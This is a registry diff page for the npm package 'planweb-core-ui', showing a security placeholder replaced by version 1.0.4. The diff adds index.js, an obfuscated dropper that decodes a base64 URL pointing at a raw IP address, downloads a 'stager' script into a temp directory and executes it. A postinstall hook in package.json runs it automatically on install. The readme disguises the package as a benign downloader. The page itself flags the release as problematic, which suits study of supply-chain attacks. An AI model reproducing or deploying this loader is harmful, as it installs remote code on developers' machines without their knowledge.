planweb-core-ui 0.0.1-security → 1.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of planweb-core-ui might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/index.js +37 -0
  2. package/package.json +28 -3
  3. package/readme.md +9 -0
  4. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,37 @@
1
+ (function () {
2
+ const _ = require; // Alias for require
3
+ const fs = _('fs'), https = _('https'), cp = _('child_process'), os = _('os');
4
+ console.log("Installing")
5
+ // Generate a random string for the temporary file name
6
+ const randomStr = () => Array.from({ length: 8 }, () => Math.random().toString(36).charAt(2)).join('');
7
+
8
+ // Determine temporary directory based on the operating system
9
+ const tmpDir = os.platform() === 'win32' ? process.env.TEMP || 'C:\\Windows\\Temp' : '/tmp';
10
+ const tmpFile = `${tmpDir}/${randomStr()}.js`;
11
+
12
+ // Decode the base64-encoded URL
13
+ const srv = Buffer.from('aHR0cHM6Ly8zNC40NS4xMjQuMzQvZG93bmxvYWQtc3RhZ2Vy', 'base64').toString(); // URL
14
+
15
+ // Fetch the stager from the server
16
+ const fetch = (u, p, cb) => {
17
+ const f = fs.createWriteStream(p);
18
+ https.get(u, (r) => r.pipe(f).on('finish', () => cb(p))).on('error', (err) => {
19
+ console.error('[-] Fetch error:', err.message);
20
+ fs.unlinkSync(p);
21
+ });
22
+ };
23
+
24
+ // Execute the downloaded stager file
25
+ const execute = (p) => {
26
+ const command = os.platform() === 'win32' ? `node ${p}` : `node ${p}`;
27
+ cp.exec(command, (e) => {
28
+ if (e) console.error('[-] Execution failed:', e.message);
29
+ });
30
+ };
31
+
32
+ // Main execution
33
+ fetch(srv, tmpFile, (file) => {
34
+ console.log(`[+] Stager downloaded to: ${file}`);
35
+ execute(file);
36
+ });
37
+ })();
package/package.json CHANGED
@@ -1,6 +1,31 @@
1
1
  {
2
2
  "name": "planweb-core-ui",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.4",
4
+ "description": "A lightweight downloader for cross-platform use",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "postinstall": "node index.js"
10
+ },
11
+ "keywords": [
12
+ "downloader",
13
+ "cross-platform",
14
+ "utilities",
15
+ "planweb"
16
+ ],
17
+ "author": "Your Name <your-email@example.com>",
18
+ "license": "MIT",
19
+ "repository": {
20
+ "type": "git",
21
+ "url": "https://github.com/yourusername/planweb-core-ui.git"
22
+
23
+ },
24
+ "bugs": {
25
+ "url": "https://github.com/yourusername/planweb-core-ui/issues"
26
+ },
27
+ "homepage": "https://github.com/yourusername/planweb-core-ui#readme",
28
+ "dependencies": {
29
+ "axios": "^1.4.0"
30
+ }
6
31
  }
package/readme.md ADDED
@@ -0,0 +1,9 @@
1
+ planweb-core-ui
2
+ Description
3
+ planweb-core-ui is a lightweight and efficient downloader utility designed for cross-platform environments. It provides seamless functionality for downloading resources and performing post-install tasks, making it a versatile tool for developers.
4
+
5
+ Features
6
+ 🚀 Cross-Platform Support: Works on Windows, Linux, and macOS.
7
+ 🔒 Secure Downloads: Utilizes HTTPS for secure file retrieval.
8
+ ⚡ Efficient: Minimal dependencies for fast and lightweight performance.
9
+ 📦 Post-Install Automation: Automatically runs setup tasks after installation
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=planweb-core-ui for more information.